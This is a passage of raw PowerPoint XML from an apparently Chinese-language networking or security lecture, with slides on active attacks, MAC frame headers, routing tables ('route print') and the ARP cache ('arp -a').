            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>预防措施：自动审计、入侵检测和完整性恢复。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293890" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>主动攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对受害者有影响</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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18DD4A24-DA2B-4273-88AC-F1E54A22E79C}"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mtClean="0"/>
              <a:t>连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>帧头部分</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4876800"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>由路由表信息和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓存信息，可以确定帧头的目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址域</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61444" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2362200"/>
            <a:ext cx="5638800" cy="406400"/>
            <a:chOff x="480" y="1488"/>
            <a:chExt cx="3552" cy="256"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61453" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1488"/>
              <a:ext cx="1200" cy="256"/>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61454" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1728" y="1488"/>
              <a:ext cx="1104" cy="256"/>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61455" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="480" y="1488"/>
              <a:ext cx="1248" cy="256"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC0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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61445" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="3352800"/>
            <a:ext cx="40386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源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>：00-06-29-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>b3-4c-49 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61446" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4434136" y="3352800"/>
            <a:ext cx="32004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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC：? ? ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219146" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4434136" y="3352800"/>
            <a:ext cx="4386336" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAC：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>00-e0-4c-de-04-26</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219147" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="4114800"/>
            <a:ext cx="167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目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219148" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3582988" y="4114800"/>
            <a:ext cx="167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路由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219149" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5826125" y="4114800"/>
            <a:ext cx="209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目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219150" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="4343400"/>
            <a:ext cx="381000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="sq">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51" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="4343400"/>
            <a:ext cx="381000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="sq">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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="219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9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191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19150"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromLeft)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2191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191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219151"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromLeft)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2191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91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19146"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="219146"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="219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build="p"/>
      <p:bldP spid="219146" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="219147" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="219148" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="219149" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="219150" grpId="0" animBg="1"/>
      <p:bldP spid="219151"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smtClean="0"/>
              <a:t>主机路由表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="7772400" cy="576064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>route print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>显示当前主机的路由表信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217092" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="543744" y="1628800"/>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lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>=============================================================</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>Active Routes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>Network Destination      	Netmask        	Gateway       	Interface 	          </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>0.0.0.0			0.0.0.0   		202.196.53.254  	202.196.53.8 127.0.0.0       		255.0.0.0     	127.0.0.1       	27.0.0.1 202.196.53.0    		255.255.255.0   	202.196.53. 8  	202.196.53.8 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>202.196.53. 8  		255.255.255.255 	127.0.0.1              127.0.0.1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>…… </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>Default Gateway:    202.196.50.254</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>===========================================================</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217093" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="4725144"/>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20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DestIP &amp; Netmask == Network Destination，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>选择相应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>发送数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
              <a:latin typeface="Verdana" panose="020B060403050404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17091">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21709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7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7093"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="217093"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="217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autoUpdateAnimBg="0" build="p"/>
      <p:bldP spid="217092" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="217093"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zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址解析协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1549632"/>
            <a:ext cx="7772400" cy="874713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>命令显示了本机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓存。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218116" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3200400"/>
            <a:ext cx="76962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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>Internet Address     	 Physical Address               Type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>  202.196.53.254            00-e0-4c-de-04-26          dynamic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>  202.196.53.57         	08-00-46-60-8d-3a          dynamic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218117" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="2514600"/>
            <a:ext cx="162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a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C:\&gt;arp -a</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="Tahoma"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utoUpdateAnimBg="0" build="p"/>
      <p:bldP spid="218116" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="218117"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FD82D046-C73D-420C-A963-A40A7C7945DE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址解析协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="2276475"/>
            <a:ext cx="3527425" cy="463550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2141984"/>
              <a:gd name="T1" fmla="*/ 77611 h 463319"/>
              <a:gd name="T2" fmla="*/ 3317913 w 2141984"/>
              <a:gd name="T3" fmla="*/ 22728 h 463319"/>
              <a:gd name="T4" fmla="*/ 11328031 w 2141984"/>
              <a:gd name="T5" fmla="*/ 1 h 463319"/>
              <a:gd name="T6" fmla="*/ 302889610 w 2141984"/>
              <a:gd name="T7" fmla="*/ 0 h 463319"/>
              <a:gd name="T8" fmla="*/ 310899654 w 2141984"/>
              <a:gd name="T9" fmla="*/ 22728 h 463319"/>
              <a:gd name="T10" fmla="*/ 314217499 w 2141984"/>
              <a:gd name="T11" fmla="*/ 77612 h 463319"/>
              <a:gd name="T12" fmla="*/ 314217710 w 2141984"/>
              <a:gd name="T13" fmla="*/ 388028 h 463319"/>
              <a:gd name="T14" fmla="*/ 310899654 w 2141984"/>
              <a:gd name="T15" fmla="*/ 442904 h 463319"/>
              <a:gd name="T16" fmla="*/ 302889610 w 2141984"/>
              <a:gd name="T17" fmla="*/ 465634 h 463319"/>
              <a:gd name="T18" fmla="*/ 11327972 w 2141984"/>
              <a:gd name="T19" fmla="*/ 465634 h 463319"/>
              <a:gd name="T20" fmla="*/ 3317913 w 2141984"/>
              <a:gd name="T21" fmla="*/ 442903 h 463319"/>
              <a:gd name="T22" fmla="*/ 158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EB641B"/>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硬件类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="2781300"/>
            <a:ext cx="1727200" cy="431800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2141984"/>
              <a:gd name="T1" fmla="*/ 38174 h 463319"/>
              <a:gd name="T2" fmla="*/ 2628 w 2141984"/>
              <a:gd name="T3" fmla="*/ 11180 h 463319"/>
              <a:gd name="T4" fmla="*/ 8974 w 2141984"/>
              <a:gd name="T5" fmla="*/ 1 h 463319"/>
              <a:gd name="T6" fmla="*/ 239958 w 2141984"/>
              <a:gd name="T7" fmla="*/ 0 h 463319"/>
              <a:gd name="T8" fmla="*/ 246303 w 2141984"/>
              <a:gd name="T9" fmla="*/ 11180 h 463319"/>
              <a:gd name="T10" fmla="*/ 248931 w 2141984"/>
              <a:gd name="T11" fmla="*/ 38174 h 463319"/>
